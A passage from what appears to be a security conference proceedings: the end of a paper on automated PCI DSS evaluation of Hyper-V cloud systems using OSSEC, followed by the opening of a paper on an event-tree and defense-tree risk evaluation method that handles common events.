Then, in the operation of method 2, the change is identified by tracking the changes of the cloud system configuration. A detected change of the machine configuration is a trigger for a security evaluation. If the network configuration is changed, the detected machine is reported as an exception, because the change may be a mistake by the system operator, and the appropriate virtual machine data are sent to the operator
machine. In method 3, the system configuration
model is built by reading the setting file data
from the Model Generator (MG) set in each
virtual machine and aggregating these data in
the MG of the operator machine. Finally, a
security evaluation is made and reported to the
system operator by using the Knowledge
Verifier (KV) that corresponds to this system
configuration model and the evaluation model
defining the detail security functions based on
the security requirements of the security
standard. We describe OSSEC, MG, and KV in
detail later in this paper.
4 PROTOTYPE DEVELOPMENT
In this section, we describe the implementation
described in Section 3. In 4.1 we show the
environment for installing the proposed method
shown in 3.2. In 4.2 we show the
implementation of the proposed method.
4.1 Environment to be built


We create the environment for security


evaluation even if the system configuration is
changed, such as the change of the application
setting in the virtual machine and/or the change
of the virtual machine deployment to make
multiple virtual machines on the cloud platform.
In this system, we use the Payment Card
Industry Data Security Standard (PCI DSS),


developed by financial institutions, as the security standard model. PCI DSS is assumed to be applied to web systems in the virtual environment, and so it is a suitable security standard for the cloud system. We build up the
web system configuration to evaluate the PCI
DSS.
To create this web system, we use Hyper-V 6.2.
Hyper-V is the virtualization system provided by Microsoft and is free for use with Windows Server 2008 64-bit or Windows 8.0. Similar applications are available, but they come at a cost, which is one reason why Hyper-V has a high market share in this field. The hardware
supporting Hyper-V is similar to a cloud
platform, and in this hardware we construct the
web system deploying virtual machines and
virtual switches shown in Figure 2.

Figure 2 Web system deployed on the Hyper-V


We set the web server in the demilitarized zone
(DMZ) and the database (DB) server in the
inside network. Also, we set a management
server to access the outside network and to
work as a router managing the virtual machine.
On each virtual machine, we block the access
by the firewall (FW) except at designated port
numbers to connect to other virtual machines.
The virtual machine connected to the virtual
switch allows the network interface (NI) to
connect to the network belonging to that virtual


switch, then it communicates to the outside


network through the virtual switch of the
Internet. We create the web system with these
minimum possible functions to evaluate the
security based on the PCI DSS.
As a prerequisite, all virtual machine OSs and
applications are unified among the virtual machines under the OS Ubuntu 14.04 LTS. Based on this OS, we make a
template having the application for evaluating
the security. Two types of templates are used.
One is for the agent to use and the other is for
the manager to manage the virtual machine and
to get the result of the security evaluation. In
this web system, the management server has the
manager functions. The system operator makes
virtual machines that have the role of web
server by installing applications such as Apache
based on the above templates. The
configuration is shown in Table 1.
Table 1 Structure of the server template

Application name   | Use of the application
OpenSSH_5.6p1      | Manage virtual machine
OSSEC-HIDS-2.8.1   | Take data in virtual machines
iptables 1.4.21    | Packet filtering / transfer
Model Generator    | Make the system configuration model
Knowledge Verifier | Evaluate the system configuration model (only operator machine)
Apache 2.2.22      | Build a web service (option)
MySQL 14.14        | Build a DB (option)
4.2 Implementation of function
Here we show more detailed functions of the
proposed method for evaluating security in the environment built as described in 4.1.


Implementation 1: Function to create the


system configuration model (Method 1)
We create a system configuration model to
evaluate the security based on the PCI DSS
from the web system in operation. To collect
the data of each virtual machine for creating
this system configuration model, we use
OSSEC, which is one of the open source
software (OSS) tools adapted from the SIEM
system. OSSEC is generally divided into the
manager and the agent. The agent installed in
each machine collects the log data and sends it
to the manager. Then the manager analyzes the
received data.
Sending the virtual machine log data from the
OSSEC agent to the manager does not need any
permission to connect to a virtual machine
because only the agent side sends the log data
to the manager. In addition, OSSEC can be
used free of charge and has been commonly
installed in PCs in a variety of environments. As mentioned above, because connection permission to the virtual machine is not needed and sophisticated installation is not required, we adopt OSSEC to create the system configuration model based on the log data. The
model of the system configuration is shown in
Table 2.
Table 2 Model of the system configuration

Attribute   | Detail of data
Object      | Machine, NI (network interface), Service, Bridge, Web server, SSH (secure shell) server, DB server, FW (firewall)
Parameter   | Network zone where an NI belongs, Rule of FW filtering
Association | Network configuration (relation between machines)
The system configuration model corresponds to
the PCI DSS security requirements and is


written for each virtual machine role, the FW


setting, and the relation between the network
zone deployed and the virtual machine that
collects the data by OSSEC. We evaluate the
security with this system configuration model.
Therefore, if OSSEC cannot recognize a virtual
machine on the web system, the machine is
handled as an irregular machine to which the System Design Checker is not applied.
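As a rough illustration only, the attributes of Table 2 could be encoded as the following Python data structures; the names and fields are hypothetical and do not reproduce the CIM-based model actually used in the paper.

from dataclasses import dataclass, field
from typing import List, Tuple

@dataclass
class NetworkInterface:
    address: str
    zone: str                                            # parameter: network zone where the NI belongs

@dataclass
class Machine:
    name: str
    services: List[str] = field(default_factory=list)    # object: e.g. "web", "ssh", "db"
    interfaces: List[NetworkInterface] = field(default_factory=list)
    fw_rules: List[str] = field(default_factory=list)    # parameter: FW filtering rules

@dataclass
class SystemConfigurationModel:
    machines: List[Machine] = field(default_factory=list)
    associations: List[Tuple[str, str]] = field(default_factory=list)   # relations between machines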
Implementation 2: Function to detect a
change in system configuration (Method 2)
(a) Detection of a change of machine
configuration
A change of the machine configuration is
detected by analyzing the log. Because OSSEC
can make a log analysis, our system monitors
virtual machines by using OSSEC. Because the
machine configuration is based on the settings of the applications, we monitor the setting files to identify the operation of each application and the usage of each port by the application. If a change occurs, an alert notifies
the system operator. Then, we evaluate the
security by this trigger.
(b) Detection of a change of Network
configuration
When a virtual machine disposition is changed,
the machine that is changed cannot be
recognized immediately by OSSEC and so that
machine is treated as an irregular machine until
OSSEC recognizes it again. The irregular
virtual machine is then identified. Therefore,
the host machine side reads the Hyper-V setting
that is the basis of the web system configuration
and shares the data of the change of the web
system network configuration with the
management server. After sharing, the web
service to provide data of the change on the
host machine is created and the management
machine accesses those data.


Implementation 3: Function to automate


security evaluation (Method 3)
For evaluating security, the analysis of the
system configuration based on the system
configuration model and the collation of the
security requirements of the PCI DSS are
executed. We describe these two functions
below.
(a) Collation with PCI DSS
Evaluation of the security is made
automatically based on the PCI DSS. For this
purpose, we developed the KV for checking the
web system security beforehand to verify
whether security functions are set on the system
configuration based on PCI DSS in the design
stage. In the web system design stage, by
inputting the system configuration model
shown in Table 2 into the KV, the inputted
system configuration model is collated with the
PCI DSS security functions. For example, the inputted system configuration is checked to confirm that access from the outside network to the DB server in the inside network is blocked. Then, a pass or fail is issued on whether the security functions of PCI DSS are satisfied, such as the placement of the web server in the DMZ. Based on the
PCI DSS, the KV verifies the security by
picking up points considered to be problems.
By inputting the present system configuration
of the cloud system, KV can verify the security
evaluation of the cloud system in operation, too.
The scope of the KV corresponds to Sections 1
and 2 for PCI DSS ver. 2.0 and the FW. (Ver.
2.0 was the latest version at the time of our
study.)
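Continuing the structures sketched earlier, a KV-like check could be expressed as follows; the two rules shown (web server placed in the DMZ, DB server not exposed to the outside zone) are simplified stand-ins for the PCI DSS requirements handled by the actual KV.

def verify_pci_dss_like_rules(model):
    """Return 'pass' or a list of findings for two simplified placement rules."""
    findings = []
    for machine in model.machines:
        zones = {ni.zone for ni in machine.interfaces}
        if "web" in machine.services and "DMZ" not in zones:
            findings.append(machine.name + ": web server is not placed in the DMZ")
        if "db" in machine.services and "outside" in zones:
            findings.append(machine.name + ": DB server is exposed to the outside network")
    return "pass" if not findings else findings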
(b) Analysis of system configuration
Our system analyzes the system configuration
and inputs the analysis results into the KV.
Therefore, our system reads the machine
configuration based on the system configuration model from each virtual machine
agent. Then it combines these obtained data and


outputs them in XML format. Each machine


configuration is read from the setting file, as
shown in Table 3.
Table 3 Machine configurations to read

Tag name   | Detail of data
Web server | Port number that Apache uses / Port number that the Virtual Host uses
SSH        | Port number that SSH uses
Database   | Port number that the DB uses
Filter     | Rule of packet filtering
NAT        | Rule of packet transfer
Interface  | IPv4 address / Subnet mask / MAC address
Bridge     | Gateway address / IPv4 address related to the gateway
The files made by each machine are collected
with the OSSEC log and combined with the
system configuration model. Then, the
combined data are inputted to the KV as shown
in Table 2. The connections among virtual
machines are made to connect the bridge tags to
each other with the same gateway address. In
addition, the network zone is distinguished as
the DMZ or the inside network from the
network address translation (NAT) tag transfer route, on the assumption that the zone having the
gateway address in the top level of a bridge tag
is the outside network.
The MG is the tool that inputs the data based on
the KV to make the above system configuration
model.
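The connection rule described here can be sketched in Python as follows, assuming a simplified MG output in which each machine lists the gateway addresses of its bridge tags; the data layout is hypothetical.

from collections import defaultdict

def connect_by_gateway(machine_configs):
    """Group machines whose bridge tags share the same gateway address; machines in the
    same group are treated as connected in the system configuration model."""
    groups = defaultdict(list)
    for conf in machine_configs:
        for bridge in conf.get("bridges", []):
            groups[bridge["gateway"]].append(conf["name"])
    connections = []
    for members in groups.values():
        connections += [(a, b) for i, a in enumerate(members) for b in members[i + 1:]]
    return connections

# Hypothetical MG output for two machines on the same virtual switch.
configs = [
    {"name": "web", "bridges": [{"gateway": "192.168.10.1"}]},
    {"name": "mgmt", "bridges": [{"gateway": "192.168.10.1"}, {"gateway": "203.0.113.1"}]},
]
print(connect_by_gateway(configs))   # [('web', 'mgmt')]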
4.3 Verification of the functions
We verify whether the issues defined in 2.3 are
resolved by using the functions installed as
shown in 4.2. For this purpose, we change the
port used by MySQL in the DB server, as
constructed in 4.1, and we change the machine
configuration. As the results, we verify the
functions to detect this change and to evaluate
the security of the current system configuration


automatically. We obtain the following results


shown in Figures 3 and 4.

Figure 3 Result of the security evaluation (Japanese description)

Figure 4 Screen of GUI (excerpt)
In Figure 3, the result says web server ID 1001
cannot gain access to the DB in the DB server.
The filtering setting of iptables in the DB server does not change, and packets to ports that are not permitted by this setting are blocked. Therefore, even though the machine configuration changes, the packets to the new port used by MySQL are blocked, and the web server cannot gain access to the DB server. For this reason, we can show that the
route from the web server to the DB server is
detected as the problem, as shown at the upper
right in Figure 4.
5 DISCUSSION
5.1 Verification by the multi-layer
The MG makes the system configuration model,
and we can evaluate the suitable requirements
of the PCI DSS without depending on the
system operator's knowledge. Though the
system configuration model that the MG has created is an input format for the KV, the MG can make a more detailed system configuration model by adding a variety of data for analysis because the MG can read the machine configuration from inside the machine. Therefore, we will consider applying our system to security standards other than the PCI DSS, and to work with other standards as new evaluation items for the security evaluation.

5.2 Tracking of system configuration changes on a large scale
In this paper, we can track changes in the model of the web system with three virtual machines.
The cloud infrastructure can build large-scale
IT systems consisting of thousands of virtual
machines. In such environments, we can use the
same process to analyze logs in the virtual
machines and to read the hardware settings.
Therefore, if the performance in the
management server is able to handle the load
for analyzing the log for changes of the system
configuration corresponding to the numbers of
the virtual machines, we deem our system to be
able to track the configuration changes in the
large-scale cloud system.
5.3 Calculation needed for security
evaluation
In the future, we will consider our application
in the large-scale environment. Therefore, we
discuss the acceptable execution time required
for a security evaluation when creating the
system configuration model and increasing the
number of virtual machines. We use the
environment for up to 100 virtual machines, all
of which have the functions of the web service,
DB, SSH, and FW corresponding to those in
this paper. We measure the execution time
when the number of virtual machines is
increased up to 100. We show the experimental
result in an environment equipped with a two-core, four-thread CPU and 4 GB memory in
Figure 5.


Figure 5 Execution time vs. number of virtual machines
The curve of the execution time is represented
by using the Microsoft Excel function that
calculates the approximate curve. By
extrapolating the curve for an increasing
number of virtual machines, we find that 200
machines take about 7 minutes and 300
machines about 20 minutes. Therefore, we can
evaluate the security for up to 200 virtual
machines. Moreover, the calculation amount for
the security evaluation is O(N^(5/2)) if the number
of machines is N. This is because the
combinations of communication routes for
analysis increase according to a power of the number of virtual machines. It is necessary to eliminate unnecessary analysis, for example by evaluating only at the points where the system configuration changes and only for the differences after the changes, in order to apply our system to a large-scale environment with several thousand virtual machines.
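As a rough consistency check using the reported values, the O(N^(5/2)) estimate implies that increasing the number of virtual machines from 200 to 300 multiplies the execution time by (300/200)^(5/2) = 1.5^2 × √1.5 ≈ 2.76, and 7 min × 2.76 ≈ 19 min, which agrees with the extrapolated value of about 20 minutes.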
5.4 Added value obtained from an
automated security evaluation
The System Design Checker can automatically
make an evaluation based on the system
configuration. Therefore, measures can be taken to maintain the security functions after the system configuration changes, so that no attacks are received while changing the cloud's
scale. On the other hand, the system configuration is changed not only by the system operator but also by attacks unrelated to the system operator. By detecting the system configuration changes, the system operator can detect changes caused not only by his or her own operation but also by attacks on the cloud.

6 CONCLUSION

We developed a real-time security evaluation system named the System Design Checker to
evaluate and score a cloud system based on
security standards in real time at the design
stage as well as at the operation stage. To
satisfy the requirements for security functions,
we developed automatic evaluation by creating
a system configuration model for the network
and the machine configurations. In addition, by
analyzing the logs in virtual machines for
monitoring the machine configuration and by
analyzing the hardware for the network
configuration comprising the cloud system, this
system can trace system configuration changes
and can respond to the changes.
To evaluate security, it is also possible to use conventional systems such as FireMon [17]. However, such conventional evaluation methods cannot analyze the packet communication between applications. The System Design Checker can model each application setting by setting an agent in each virtual machine, and we can then analyze the network even between complicated applications on the virtual machines that construct the cloud system. Even as the number of applications increases, we can find the problems of each virtual machine at the edge of the router.
In conclusion, our system needs less human
power to operate and maintain cloud security.
In the future, we will increase the system
operation speed and add new security
evaluation points. We also need to test and
evaluate this system in more specific situations.


REFERENCES

[1] NISC (National center of Incident readiness and Strategy for Cybersecurity), General technical standard for security measures of the government, http://www.nisc.go.jp/active/general/pdf/k305111.pdf

[2] Y. Ashino, Y. Takahashi, Y. Morita, S. Shima, T. Okamura, Y. Teshigawara, R. Sasaki, "Development of IT System Design Support Tool Based on Security Standards," CSS (Computer Security Symposium), Vol. 4, pp. 478-485, 2013.

[3] M. Sekine, Y. Ashino, S. Shima, Y. Teshigawara, R. Sasaki, "Development and evaluation of a dynamic evaluation method for cloud system security during operation," Research Report on Computer Security (CSEC), Vol. 2016-CSEC-72, No. 30, pp. 1-8, 2016.

[4] R. Shaikh, M. Sasikumar, "Trust Model for Measuring Security Strength of Cloud Computing Service," International Conference on Advanced Computing Technologies and Applications, Vol. 45, pp. 380-389, 2015.

[5] J. Che, Y. Duan, T. Zhang, J. Fan, "Study on the Security Models and Strategies of Cloud Computing," Procedia Engineering, Vol. 23, pp. 586-593, 2011.

[6] AWS (Amazon Web Services), Amazon Inspector, https://aws.amazon.com/inspector/

[7] A. Ambre, N. Shekokar, "Insider Threat Detection Using Log Analysis and Event Correlation," International Conference on Advanced Computing Technologies and Applications, Vol. 45, pp. 436-445, 2015.

[8] Y. Watanabe, M. Mizutani, N. Uramoto, "Event Monitoring and Analytics for Compliance Automation on IaaS Public Cloud," Vol. 2015-DPS-162, No. 32, pp. 1-6, 2015.

[9] O. Söderström, E. Moradian, "Secure Audit Log Management," 17th International Conference on Knowledge-Based and Intelligent Information and Engineering Systems, Vol. 22, pp. 1249-1258, 2013.

[10] NTT Data, About Hinemos, http://www.hinemos.info/hinemos

[11] SCSK, About ArcSight ESM, https://www.scsk.jp/sp/sys/products/arcsight/

[12] DMTF (Distributed Management Task Force), Common Information Model, http://www.dmtf.org/standards/cim

[13] Microsoft, Hyper-V WMI provider (V2), https://msdn.microsoft.com/en-us/library/hh850319(v=vs.85).aspx

[14] Security Standards Council, PCI SSC Data Security Standards Overview, https://www.pcisecuritystandards.org/security_standards/index.php

[15] @IT Special, Reason that Hyper-V was Number One in Japan, http://www.atmarkit.co.jp/ait/articles/1303/14/news004.html

[16] OSSEC Team, About OSSEC, http://www.ossec.net/?page_id=4

[17] Fujitsu Social Science Laboratories, About FireMon, http://www.fujitsu.com/jp/group/ssl/products/network/security/networksecurity/netproducts/firemon/


Proposal of an Improved Event Tree and Defense Tree


Combined Method for Risk Evaluation with Common Events
Ryo Aihara, Ryohei Ishii and Ryoichi Sasaki
Tokyo Denki University
Senjuasahi-cho 5, Adachi-ku, Tokyo-to, 120-8551 JAPAN
[email protected], [email protected]

ABSTRACT
Damage caused by targeted attacks has
increased in recent years. In order to cope with
the issue, we previously developed the event
tree and defense tree combined (EDC) method
for obtaining the optimal combination of
countermeasures against targeted attacks based
on security analyses. However, the original
EDC method cannot deal with common events,
i.e., events that are the common cause of more
than one type of problem, here and in the main
text. In order to deal with common events,
instead of minimal cut set (MCS) operation, we
introduce the prime implicant set (PIS)
operation, which can obtain cut sets, including
negative events, for the sequence of the event
tree. The results of a numerical experiment
confirm that the occurrence probability can be
calculated correctly by introducing the PIS.
Moreover, if PIS operation is not implemented,
the overall risk may be underestimated by a
factor of three.
KEYWORDS
APT, Targeted attack, Risk assessment, Defense
tree, Attack tree.

1 Introduction
Proper quantitative risk analysis is essential in
order to employ proper countermeasures
against ever-increasing cyber-attacks. A
number of revised methods based on attack tree
analysis [1], developed by Bruce Schneier, have
been proposed. Bistarelli et al. [2] proposed a
defense tree in order to determine possible
countermeasures.


However, it is difficult to apply these methods


to attacks, such as targeted attacks, that are
composed of a variety of attack events that
occur over time.
In recent years, the damage caused by targeted
attacks has been on the rise [3]. Therefore, we
developed the event tree and defense tree
combined (EDC) method [4]. The EDC
method, which consists of an event tree analysis
method and the defense tree analysis method,
can also obtain the optimal combination of
countermeasures against targeted attacks based
on a security analysis.
Although there already exists a similar risk
analysis method which incorporates event tree
analysis and fault tree analysis and is used for
the safety assessment of nuclear power
plants [5], this method cannot determine
appropriate countermeasures.
By applying the EDC method to a targeted
attack on a small company, we confirm that the
EDC method is useful for obtaining the optimal
combination of countermeasures against
targeted attacks. However, the original EDC
method did not consider common events, which
are events that cause more than one problem at
the same time. In general, if a common event is
not taken into consideration, the risk will be
underestimated or overestimated.
In the original EDC method, the following two
common events can be considered:
(1) The impact of a countermeasure on
multiple attacks.
(2) Events that are the common cause of more
than one type of problem.
For common event (1), if the correct
countermeasure is applied to the attacks, it is


possible to correctly estimate the risk reduction


effect by the conventional method of
calculation. For common event (2), improved
calculation methods are expected to be
required.
In the present paper, we investigate a method
of addressing the problems related to common
event (2). In the field of reliability engineering,
this type of common event is referred to as a
common mode failure. In this field, after
expressing the relationship of events by a fault
tree, the common mode failure in the fault tree
problem is usually solved using a minimal cut
set (MCS) calculation [6].
However, for the case of using a combination
of event tree analysis and defense tree analysis,
because of the requirement to include a
negative event, it is impossible to solve a
common event problem using an MCS, as
described in detail in Section 3.2. Therefore, we
decided to use the method of deriving the prime
implicant set (PIS) that can be applied to
negative events [7].
Although the number of studies dealing with
the security evaluation is increasing [8][9],
there are no studies that take into account a
common event in the security evaluation. There
are also no studies that have used the PIS for
assessment in conjunction with the proposed
countermeasures, in the field of security
evaluation or any other field.
In the present paper, we present a calculation
method that takes into account a common event
by deriving the PIS for the EDC method. After
we propose this method, which enables
common event operation using the EDC
method, the effect of considering a common
event used in the EDC method is demonstrated
through a numerical experiment.

2 Original EDC method

2.1 Overview of the original EDC method
The original EDC method includes a function to obtain the optimal combination of countermeasures. The combination of event tree analysis and defense tree analysis is used in the original EDC method, which is suitable for analyzing targeted attacks consisting of a


variety of attack events that occur over time.
The original EDC method is implemented as
follows.
Step 1 Determine the target for evaluation
The target for evaluation is determined. As an
example, a small WEB service company is
considered as a target.
Step 2 Analyze the target
The target is analyzed for formulation. For
example, the number of servers and PCs of the
company are estimated for use in the
evaluation. Moreover, a targeted attack similar
to the attack on the Japan Pension Service was
assumed in this case.
Step 3 Decide the objective function and the
constraints function.
In the sample case, the total cost, which is the
overall risk and the cost to implement the
countermeasures, was selected as the objective
function. The cost to implement the
countermeasures was selected as the constraint.
Step 4 Propose alternative countermeasures
The countermeasures, for example, education
on how to handle suspicious emails or the
introduction of a sandbox, are proposed in order
to determine the overall risk.
Step 5 Formulate a combinatorial optimization
problem
The objective function and constraint function
can be expressed by the following numerical
formula, which includes zero-one variables:

Minimize  R(x_1, x_2, x_3, ..., x_n) + Σ_{i=1}^{n} c_i x_i        (1)

subject to  Σ_{i=1}^{n} c_i x_i ≤ C        (2)

where x_i represents the zero-one variable. If the i-th countermeasure is adopted, x_i = 1; otherwise, x_i = 0. Here, c_i represents the cost of the i-th countermeasure, C is the constraint on the total cost, and R is the function to calculate the overall risk using event tree analysis and


defense tree analysis, as described in some


detail in Sections 2.2 and 2.3.
Step 6 Obtain the optimal combination of the
proposed countermeasures
By using a combinatorial optimization
program, the optimal combination of the
proposed countermeasures is obtained.
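Under the assumption that the number of alternative countermeasures stays small (12 in the case study of Section 2.4), Step 6 can be realized by brute-force enumeration, as in the following Python sketch; the cost values and the risk function below are made up for illustration and are not the paper's data.

from itertools import product

def optimal_countermeasures(costs, budget, overall_risk):
    """Enumerate all zero-one assignments x, keep those with sum(c_i * x_i) <= budget
    (Equation (2)), and return the one minimizing overall_risk(x) + sum(c_i * x_i)
    (Equation (1))."""
    best_x, best_value = None, float("inf")
    for x in product([0, 1], repeat=len(costs)):
        cost = sum(c * xi for c, xi in zip(costs, x))
        if cost > budget:
            continue
        value = overall_risk(x) + cost
        if value < best_value:
            best_x, best_value = x, value
    return best_x, best_value

# Toy example with a made-up risk function; the real R(x) comes from the
# event tree / defense tree analysis of Sections 2.2 and 2.3.
costs = [3, 5, 2]
risk = lambda x: 100 * (1 - 0.3 * x[0]) * (1 - 0.4 * x[1]) * (1 - 0.2 * x[2])
print(optimal_countermeasures(costs, budget=8, overall_risk=risk))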
2.2 Event tree analysis
Event tree analysis is a probabilistic risk
analysis technique. In event tree analysis, after
an undesirable event, which is referred to as the
initiating event, has occurred, the sequence of
events that follows is expressed as a tree, as
illustrated in Fig. 1.
In this case, Events 1 and 2 are the heading
items. For each heading item, the tree is
branched into success and failure branches from
the viewpoint of the attackers. Here, sequence 1
indicates that, even though a targeted mail
containing malware was sent to the institute, no
PCs at the institute were infected. Sequence 2
indicates that, even though a PC was infected,
the attacker failed to obtain information from
the institute. In contrast, sequence 3 indicates
that, after a PC was infected, the attacker
obtained information from the institute.
Next, in the event tree analysis, the success
probability P_i for heading item i is calculated using defense tree analysis. The failure probability for heading item i can then be obtained as (1 − P_i).
The probability of the sequence can be
obtained by multiplying the probability of the
initiating event and the occurrence probability
of the heading items. For example, in the case
of Fig. 1, the probability of sequence 1, 2, and
3, which are represented as Q_1, Q_2, and Q_3, can be obtained as follows:

Q_1 = P_0 × (1 − P_1)
Q_2 = P_0 × P_1 × (1 − P_2)
Q_3 = P_0 × P_1 × P_2        (3)

The risk value of sequence k can be calculated


by multiplying the probability of sequence k
and the magnitude of the impact due to the
occurrence the sequence k, as follows:
=

(4)

The overall risk is defined as the summation of


the risks of all sequences, as below:

R = Σ_k R_k        (5)

The overall risk R is used as an index to


reduce the risk.
Here, the success probability P_i for heading item i is estimated using defense tree analysis of the present situation and of the situation after countermeasures are implemented.
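A minimal Python sketch of Equations (3) through (5), using illustrative numbers rather than the values of the paper's case study:

def sequence_probabilities(p0, p1, p2):
    """Sequence probabilities of the event tree in Fig. 1 (Equation (3))."""
    q1 = p0 * (1 - p1)
    q2 = p0 * p1 * (1 - p2)
    q3 = p0 * p1 * p2
    return q1, q2, q3

def overall_risk(probabilities, impacts):
    """Overall risk R as the sum of Q_k * M_k over all sequences (Equations (4) and (5))."""
    return sum(q * m for q, m in zip(probabilities, impacts))

qs = sequence_probabilities(p0=1.0, p1=0.36, p2=0.04)   # illustrative values only
print(overall_risk(qs, impacts=[10, 100, 1000]))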

Figure 1. Example of an event tree

2.3 Defense tree analysis


In the present paper, the defense tree consists
of an attack component and a defense
component, as illustrated in Fig. 2. The attack
component is expressed by the upper part of the
defense tree. The top event of the defense tree
represents the success of the attack related to
each heading item of the event tree. Therefore,
the probability of the top event of the defense
tree is equal to P_j, which represents the success


probability of the j-th heading item. The causes


of the success are represented using AND/OR
gates as shown in Fig. 2. The expansion to the
lower direction using AND/OR gates is
continued until reaching the level at which the
countermeasure is prepared.


Figure 2. Example of a defense tree

The defense component of the defense tree is


represented by a box indicating a candidate
countermeasure under the lowest event of the
attack component, as shown in Fig. 2. Multiple
countermeasures can be prepared for one of the
lowest events on the attack tree.
The probability of the top event of the defense
tree before carrying out countermeasures is
calculated as follows.
Here, we define a as the event "Data retrieval," as shown in Fig. 2. We also define b as the event "Success of communication that does not pass through a proxy," and c as the event "Slip through the C&C server's blacklist."
In the present paper, "x OR y" is represented as "x, y," and "x AND y" is represented as "xy." Then, the top event can be represented as "ab, ac" from the structure of the defense tree.
If P_a, the probability of a, is 0.7, P_b = 0.2, and P_c = 0.4, then the probability of the top event can be calculated as follows:

P_top = P(ab, ac)
      = 1 − (1 − P_a P_b)(1 − P_a P_c)
      = 1 − (1 − 0.7 × 0.2)(1 − 0.7 × 0.4)
      ≈ 0.38        (6)

Next, we explain the method used to calculate the top event probability after countermeasures are carried out on the lowest events, taking event a as an example. First, the probability P_a' of event a when countermeasures are carried out can be calculated as follows:

P_a' = P_a × Π_{i=1}^{n_a} {(1 − x_ai) + x_ai α_ai}        (7)

where x_ai are zero-one variables. If the i-th countermeasure for event a is adopted, x_ai = 1; else x_ai = 0. Moreover, n_a is the number of countermeasures, and α_ai represents the decrease effect when the i-th countermeasure for event a is adopted.
In the case of Fig. 2, n_a = 1 and α_a1 = 0.5. Then, if the countermeasure is adopted, the value of P_a' is equal to 0.7 × 0.5 = 0.35. Therefore, the probability of the top event is
P_top = P(a'b, a'c)
      = 1 − (1 − P_a' P_b)(1 − P_a' P_c)
      = 1 − (1 − 0.35 × 0.2)(1 − 0.35 × 0.4)
      ≈ 0.20        (8)
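The calculation in Equations (6) through (8) can be sketched in Python as follows, using the probabilities of the example in the text.

def adjusted_probability(p, adopted, effects):
    """Equation (7): multiply the event probability by (1 - x_i + x_i * alpha_i) for each countermeasure."""
    for x, alpha in zip(adopted, effects):
        p *= (1 - x) + x * alpha
    return p

def top_event_probability(pa, pb, pc):
    """Probability of the top event "ab, ac" of the defense tree in Fig. 2 (Equations (6) and (8))."""
    return 1 - (1 - pa * pb) * (1 - pa * pc)

print(round(top_event_probability(0.7, 0.2, 0.4), 2))        # ~0.38, Equation (6)
pa = adjusted_probability(0.7, adopted=[1], effects=[0.5])   # P_a' = 0.35
print(round(top_event_probability(pa, 0.2, 0.4), 2))         # ~0.20, Equation (8)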
As a result, Step 5 can be described as follows.
Step 5-1 Obtain the cut set of the attack component of each defense tree. In the case of Fig. 4, the cut sets are a and b for heading item 1 and ac for heading item 2.
Step 5-2 Obtain the formulation to obtain the
success
probability
considering
countermeasures for each sequence (See
Equations (7) and (8)).
Step 5-3 Obtain a formulation to calculate the
probability
considering
alternative
countermeasures for each sequence (see
Equation (3)).


Step 5-4 Obtain a formulation, such as


Equation (4), to calculate the risk for each
sequence.
Step 5-5 Obtain a formulation to calculate the
overall risk (See Equation (5)).
2.4 Application of the original EDC
The original EDC was applied to a small WEB
service company [4]. In this case, the number of
heading items of the event tree was eight. The
number of alternative countermeasures was 12.
When the value of the cost constraint C was set to 2 yen or 3 yen, the optimal combination of countermeasures was obtained.
The application confirmed that the EDC
method is useful for obtaining the optimal
combination of countermeasures against
targeted attacks.
3 Proposed method
3.1 Common events
When multiple events occur at the same time
due to a single causal event, the causal event is
referred to as the common event.
First, we explain the common event using a
fault tree.
In Fig. 3, the common event is expressed as "Power outage." If a power outage occurs, the event "Room darkens" occurs immediately, although the event "Power outage" is described in two parts in Fig. 3.
If such common events are not considered, it
will be impossible to obtain an accurate
probability.
A common event is referred to as a common
mode failure in the field of reliability
engineering.
We can obtain the correct probability by deriving the MCS for this problem.

Figure 3. Examples of common mode failure in a fault


tree

3.2 MCS operation


The MCS is a set of minimum combinations
that guarantee the occurrence of the top event in
the fault tree. The MCS can be derived using
the absorption rule and the idempotent rule in
Boolean operation [10].
In Fig. 3, the cut sets of the top event are represented as aa, ab, ac, bc for the case in which no common events are considered. Using the absorption rule and the idempotent rule of Boolean operations, it is possible to derive the MCS for the top event of this fault tree as follows:

aa, ab, ac, bc
= a, ab, ac, bc (because aa is transformed into a according to the idempotent rule)
= a, bc (because ab and ac are absorbed into a according to the absorption rule)        (9)
The probability of the top event without considering the common event is calculated as follows:

P(aa, ab, ac, bc)
= 1 − (1 − P_a P_a)(1 − P_a P_b)(1 − P_a P_c)(1 − P_b P_c)
= 1 − (1 − 0.04)(1 − 0.04)(1 − 0.04)(1 − 0.04)
= 1 − 0.96 × 0.96 × 0.96 × 0.96
≈ 0.15        (10)
When we consider a common event and MCS
operation is used, the probability of the top
event is calculated as follows:


P(a, bc) = 1 − (1 − P_a)(1 − P_b P_c)
= 1 − (1 − 0.2)(1 − 0.04)
= 1 − 0.8 × 0.96
≈ 0.23        (11)
From Equations (10) and (11), we can
determine that the probability in the case of
deriving the MCS becomes approximately 1.5
times larger than that without MCS operation.
As shown here, if we do not consider the
common event, the risk can be easily
underestimated. It is easy to also use MCS
operation in the defense tree. However, in the
EDC method, event tree analysis and the
defense tree are used in combination.
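A small Python sketch of the MCS reduction and of the two probability calculations for the Fig. 3 example (Equations (10) and (11)); the representation of cut sets is an implementation choice of this sketch, not notation from the paper.

def cut_set_probability(cut_set, p):
    """Probability of one cut set, treating every listed occurrence as independent
    (exactly the treatment that ignores the common event)."""
    prob = 1.0
    for e in cut_set:
        prob *= p[e]
    return prob

def top_probability(cut_sets, p):
    """Approximate P(top) = 1 - product over cut sets of (1 - P(cut set))."""
    prob = 1.0
    for c in cut_sets:
        prob *= 1 - cut_set_probability(c, p)
    return 1 - prob

def minimal_cut_sets(cut_sets):
    """Idempotent rule (aa -> a) followed by the absorption rule (a absorbs ab and ac)."""
    sets = {frozenset(c) for c in cut_sets}
    return [c for c in sets if not any(other < c for other in sets)]

p = {"a": 0.2, "b": 0.2, "c": 0.2}
raw = [("a", "a"), ("a", "b"), ("a", "c"), ("b", "c")]      # cut sets of the Fig. 3 fault tree
print(round(top_probability(raw, p), 2))                    # ignoring the common event: ~0.15
print(round(top_probability(minimal_cut_sets(raw), p), 2))  # with MCS operation:        ~0.23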
The event tree illustrated in Fig. 1 has two
heading items. Let defense trees related to
heading items 1 and 2 be expressed as shown in
Fig. 4. Here, the extended defense tree, which
represents sequence 3, is shown in Fig. 5. This
extended defense tree is similar to the original
defense tree, and it is possible to use MCS
operation.
On the other hand, the extended defense tree,
which represents sequences 1 and 2, is shown
in Fig. 5. This extended defense tree includes a
negative event. It is impossible to apply MCS
operation to this type of tree. Therefore, instead
of MCS operation, we use PIS operation, which is an extension of MCS operation based on Boolean operations (see Table 1).

